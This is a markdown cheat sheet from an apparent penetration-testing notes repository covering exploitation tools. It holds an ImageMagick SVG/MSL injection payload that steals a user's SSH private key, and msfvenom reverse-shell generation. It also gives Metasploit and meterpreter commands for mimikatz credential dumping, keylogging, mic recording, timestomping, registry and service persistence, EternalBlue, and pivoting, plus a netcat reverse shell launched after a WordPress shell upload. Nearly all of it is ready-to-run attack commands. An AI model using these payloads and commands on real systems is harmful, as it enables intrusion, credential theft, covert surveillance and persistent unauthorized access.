Skip to content

Latest commit

 

History

History
468 lines (378 loc) · 16.8 KB

08_exploitation_tools.md

File metadata and controls

468 lines (378 loc) · 16.8 KB
Raw

Exploitation Tools

Table of Contents

Resources

Name Description URL
Evil-WinRM The ultimate WinRM shell for hacking/pentesting https://github.com/Hackplayers/evil-winrm
Exploitalert Listing of latest Exploits https://exploitalert.com
Metasploit Metasploit Framework https://github.com/rapid7/metasploit-framework
TheFatRat TheFatRat is an exploiting tool which compiles a malware with famous payload, and then the compiled maware can be executed on Linux , Windows , Mac and Android. https://github.com/Screetsec/TheFatRat

ImageTragick

https://imagetragick.com/

MSL / Polyglot Attack

https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html

poc.svg

<image authenticate='ff" `echo $(cat /home/<USERNAME>/.ssh/id_rsa)> /dev/shm/id_rsa`;"'>
  <read filename="pdf:/etc/passwd"/>
  <get width="base-width" height="base-height" />
  <resize geometry="400x400" />
  <write filename="test.png" />
  <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <image xlink:href="msl:poc.svg" height="100" width="100"/>
  </svg>
</image>

Executing Payload

$ convert poc.svg poc.png
$ cp /tmp/poc.svg /var/www/html/convert_images/

Metasploit

https://github.com/rapid7/metasploit-framework

https://github.com/rapid7/metasploit-payloads

General Usage

$ sudo msfdb run                           // start database
$ sudo msfdb init                          // database initialization
$ msfdb --use-defaults delete              // delete existing databases
$ msfdb --use-defaults init                // database initialization
$ msfdb status                             // database status
msf6 > workspace                           // metasploit workspaces
msf6 > workspace -a <WORKSPACE>            // add a workspace
msf6 > workspace -r <WORKSPACE>            // rename a workspace
msf6 > workspace -d <WORKSPACE>            // delete a workspace
msf6 > workspace -D                        // delete all workspaces
msf6 > db_nmap <OPTIONS>                   // execute nmap and add output to database
msf6 > hosts                               // reads hosts from database
msf6 > services                            // reads services from database
msf6 > vulns                               // displaying vulnerabilities
msf6 > search                              // search within metasploit
msf6 > set RHOST <RHOST>                   // set remote host
msf6 > set RPORT <RPORT>                   // set remote port
msf6 > run                                 // run exploit
msf6 > spool /PATH/TO/FILE                 // recording screen output
msf6 > save                                // saves current state
msf6 > exploit                             // using module exploit
msf6 > payload                             // using module payload
msf6 > auxiliary                           // using module auxiliary
msf6 > encoder                             // using module encoder
msf6 > nop                                 // using module nop
msf6 > show sessions                       // displays all current sessions
msf6 > sessions -i 1                       // switch to session 1
msf6 > sessions -u <ID>                    // upgrading shell to meterpreter
msf6 > sessions -k <ID>                    // kill specific session
msf6 > sessions -K                         // kill all sessions
msf6 > jobs                                // showing all current jobs
msf6 > show payloads                       // displaying available payloads
msf6 > resource /PATH/TO/FILE/<FILE>.rc    // load resource (.rc) file
msf6 > set VERBOSE true                    // enable verbose output
msf6 > set forceexploit true               // exploits the target anyways
msf6 > set EXITFUNC thread                 // reverse shell can exit without exit the program
msf6 > set AutoLoadStdapi false            // disables autoload of stdapi
msf6 > set PrependMigrate true             // enables automatic process migration
msf6 > set PrependMigrateProc explorer.exe                        // auto migrate to explorer.exe
msf6 > use post/PATH/TO/MODULE                                    // use post exploitation module
msf6 > use post/linux/gather/hashdump                             // use hashdump for Linux
msf6 > use post/multi/manage/shell_to_meterpreter                 // shell to meterpreter
msf6 > use exploit/windows/http/oracle_event_processing_upload    // use a specific module
C:\> > Ctrl + z                                  // put active meterpreter shell in background
meterpreter > loadstdapi                         // load stdapi
meterpreter > background                         // put meterpreter in background (same as "bg")
meterpreter > shell                              // get a system shell
meterpreter > channel -i <ID>                    // get back to existing meterpreter shell
meterpreter > ps                                 // checking processes
meterpreter > migrate 2236                       // migrate to a process
meterpreter > getuid                             // get the user id
meterpreter > sysinfo                            // get system information
meterpreter > search -f <FILE>                   // search for a file
meterpreter > upload                             // uploading local files to the target
meterpreter > ipconfig                           // get network configuration
meterpreter > load powershell                    // loads powershell
meterpreter > powershell_shell                   // follow-up command for load powershell
meterpreter > powershell_execute                 // execute command
meterpreter > powershell_import                  // import module
meterpreter > powershell_shell                   // shell
meterpreter > powershell_session_remove          // remove
meterpreter > powershell_execute 'Get-NetNeighbor | Where-Object -Property State -NE "Unreachable" | Select-Object -Property IPAddress'                                // network discovery
meterpreter > powershell_execute '1..254 | foreach { "<XXX.XXX.XXX>.${_}: $(Test-Connection -TimeoutSeconds 1 -Count 1 -ComputerName <XXX.XXX.XXX>.${_} -Quiet)" }'    // network scan
meterpreter > powershell_execute 'Test-NetConnection -ComputerName <RHOST> -Port 80 | Select-Object -Property RemotePort, TcpTestSucceeded'                            // port scan
meterpreter > load kiwi                          // load mimikatz
meterpreter > help kiwi                          // mimikatz help
meterpreter > kiwi_cmd                           // execute mimikatz native command
meterpreter > lsa_dump_sam                       // lsa sam dump
meterpreter > dcsync_ntlm krbtgt                 // dc sync
meterpreter > creds_all                          // dump all credentials
meterpreter > creds_msv                          // msv dump
meterpreter > creds_kerberos                     // kerberos dump
meterpreter > creds_ssp                          // ssp dump
meterpreter > creds_wdigest                      // wdigest dump
meterpreter > getprivs                           // get privileges after loading mimikatz
meterpreter > getsystem                          // gain system privileges if user is member of administrator group
meterpreter > hashdump                           // dumps all the user hashes
meterpreter > run post/windows/gather/checkvm    // check status of the target
meterpreter > run post/multi/recon/local_exploit_suggester    // checking for exploits
meterpreter > run post/windows/manage/enable_rdp              // enables rdp
meterpreter > run post/multi/manage/autoroute                 // runs autoroutes
meterpreter > run auxiliary/server/socks4a                    // runs socks4 proxy server
meterpreter > keyscan_start                                   // enabled keylogger
meterpreter > keyscan_dump                                    // showing the output
meterpreter > screenshare                                     // realtime screen sharing
meterpreter > screenshare -q 100                              // realtime screen sharing
meterpreter > record_mic                                      // recording mic output
meterpreter > timestomp                                       // modify timestamps
meterpreter > execute -f calc.exe                             // starts a program on the victim
meterpreter > portfwd add -l <LPORT> -p <RPORT> -r 127.0.0.1    // port forwarding

Metasploit through Proxychains

$ proxychains -q msfconsole

Meterpreter Listener

Generate Payload

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o meterpreter_payload.exe

Setup Listener for Microsoft Windows

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST <LHOST>
LHOST => <LHOST>
msf6 exploit(multi/handler) > set LPORT <LPORT>
LPORT => <LPORT>
msf6 exploit(multi/handler) > run

Setup Listener for MacOS

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST <LHOST>
LHOST => <LHOST>
msf6 exploit(multi/handler) > set LPORT <LPORT>
LPORT => <LPORT>
msf6 exploit(multi/handler) > set PAYLOAD python/meterpreter/reverse_tcp
PAYLOAD => python/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > exploit

Download Files

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o <FILE>.exe
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST <LHOST>
LHOST => <LHOST>
msf6 exploit(multi/handler) > set LPORT <LPORT>
LPORT => <LPORT>
msf6 exploit(multi/handler) > run
C:\> .\<FILE>.exe
meterpreter > download *

Enumeration

SNMP Scan

msf6 > use auxiliary/scanner/snmp/snmp_login
msf6 auxiliary(scanner/snmp/snmp_login) > set RHOSTS <RHOST>
msf6 auxiliary(scanner/snmp/snmp_login) > run

SNMP Enum

msf6 > use auxiliary/scanner/snmp/snmp_enum
msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS <RHOST>
msf6 auxiliary(scanner/snmp/snmp_enum) > run

Tomcat Enumeration

msf6 > use auxiliary/scanner/http/tomcat_mgr_login
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS <RHOST>
msf6 auxiliary(scanner/http/tomcat_mgr_login) > run

Exploit Suggester

msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set session 1
msf6 post(multi/recon/local_exploit_suggester) > run

Execute Binaries

Port Forwarding with Chisel

meterpreter > execute -Hf chisel.exe -a "client -v <LHOST>:<LPORT> R:1092:socks"

Pivoting

Port Forwarding with Meterpreter

meterpreter > portfwd add -L 127.0.0.1 -l <LPORT> -p <RPORT> -r <RHOST>

SOCKS Proxy on Meterpreter Sessions

msf6 > use auxiliary/server/socks_proxy

Pivoting with Meterpreter

meterpreter > run autoroute -s <XXX.XXX.XXX>.0/24
background
msf6 > use auxiliary/scanner/portscan/tcp

Auxiliary Handling

Auxiliary Setup

msf6 > use auxiliary/scanner/http/tvt_nvms_traversal
msf6 auxiliary(scanner/http/tvt_nvms_traversal) > set RHOSTS <RHOST>
msf6 auxiliary(scanner/http/tvt_nvms_traversal) > set FILEPATH Users/Nathan/Desktop/Passwords.txt
msf6 auxiliary(scanner/http/tvt_nvms_traversal) > run

Auxiliary Output Directory

/home/kali/.msf4/loot/20200623090635_default_<RHOST>_nvms.traversal_680948.txt

Persistence

Setting up Persistent Access

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o shell.exe

Copy exploit to target machine

msf6 > use exploit/windows/local/persistence
msf6 > set session 1
msf6 > use windows/meterpreter/reverse_tcp

Persistence through persistence_service

msf6 > use exploit/windows/local/persistence_service
msf6 > set session 2
msf6 > set lport 5678
msf6 > exploit
msf6 > use exploit/multi/handler
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set lhost <LHOST>
msf6 > set lport 5678
msf6 > exploit

Persistence through Persistence_exe

msf6 > use post/windows/manage/persistence_exe
msf6 > set session 1
msf6 > set rexepath /root/payload.exe
msf6 > exploit
msf6 > use exploit/multi/handler
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set lhost <LHOST>
msf6 > set lport 1234
msf6 > exploit

Persistence through Registry

msf6 > use exploit/windows/local/registry_persistence 
msf6 > set session 1
msf6 > set lport 7654
msf6 > exploit
msf6 > use exploit/multi/handler
msf6 > set set payload windows/meterpreter/reverse_tcp
msf6 > set lhost <LHOST>
msf6 > set lport 7654
msf6 > exploit

Exploit Handling

web_delivery Handler

msf6 > use exploit/multi/script/web_delivery
msf6 exploit(multi/script/web_delivery) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set LHOST <LHOST>
msf6 exploit(multi/script/web_delivery) > set SRVHOST <LPORT
msf6 exploit(multi/script/web_delivery) > set SRVPORT 80
msf6 exploit(multi/script/web_delivery) > set target 2
msf6 exploit(multi/script/web_delivery) > set LPORT 445
msf6 exploit(multi/script/web_delivery) > run -j

Example Execution

$ crackmapexec smb <RHOST> -u <USERNAME> -p <PASSWORD> --local-auth -M web_delivery -o URL=http://<LHOST>/j0wUlo2EX

WP Shell Upload

msf6 > use exploit/unix/webapp/wp_admin_shell_upload
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD P@s5w0rd!
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME admin
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /wordpress
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS <RHOST>
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LHOST <LHOST>
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LPORT <LPORT>
msf6 > run

Example Execution

meterpreter > cd C:/inetpub/wwwroot/wordpress/wp-content/uploads
meterpreter > execute -f nc.exe -a "-e cmd.exe <LHOST> <LPORT>"

Dedicated Exploits

msf6 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d
msf6 exploit(windows/local/ms10_015_kitrap0d) > set session 1
msf6 exploit(windows/local/ms10_015_kitrap0d) > set LHOST <LHOST>
msf6 exploit(windows/local/ms10_015_kitrap0d) > set payload windows/meterpreter_reverse_tcp
msf6 exploit(windows/local/ms10_015_kitrap0d) > exploit

Additional Options

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT <LPORT>
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST <LHOST>
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS <RHOST>
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit -j
msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 1

Meterpreter SSL Certificate Validation

https://www.darkoperator.com/blog/2015/6/14/tip-meterpreter-ssl-certificate-validation

msf6 > use auxiliary/gather/impersonate_ssl
msf6 auxiliary(gather/impersonate_ssl) > set RHOST www.google.com
msf6 auxiliary(gather/impersonate_ssl) > run
msf6 auxiliary(gather/impersonate_ssl) > use payload/windows/meterpreter/reverse_http
msf6 payload(windows/meterpreter/reverse_http) > set stagerverifysslcert true
msf6 payload(windows/meterpreter/reverse_http) > use payload/windows/meterpreter/reverse_https
msf6 payload(windows/meterpreter/reverse_https) > set stagerverifysslcert true
msf6 payload(windows/meterpreter/reverse_https) > set HANDLERSSLCERT /home/<USERNAME>/.msf4/loot/20240229080801_default_142.250.186.164_142.250.186.164__899022.pem
msf6 payload(reverse_https) > set LHOST <LHOST>
msf6 payload(reverse_https) > set LPORT <LPORT>
msf6 payload(reverse_https) > generate -t exe -f /tmp/<FILE>.exe
msf6 payload(reverse_https) > use exploit/multi/handler
msf6 exploit(handler) > set LHOST <LHOST>
msf6 exploit(handler) > set LPORT <LPORT>
msf6 exploit(handler) > set HANDLERSSLCERT /home/<USERNAME>/.msf4/loot/20240229080801_default_142.250.186.164_142.250.186.164__899022.pem
msf6 exploit(handler) > set stagerverifysslcert true
msf6 exploit(handler) > exploit -j

searchsploit

$ searchsploit <NAME>
$ searchsploit --cve <CVE>
$ searchsploit -m <ID>
$ searchsploit -x <ID> / <PATH>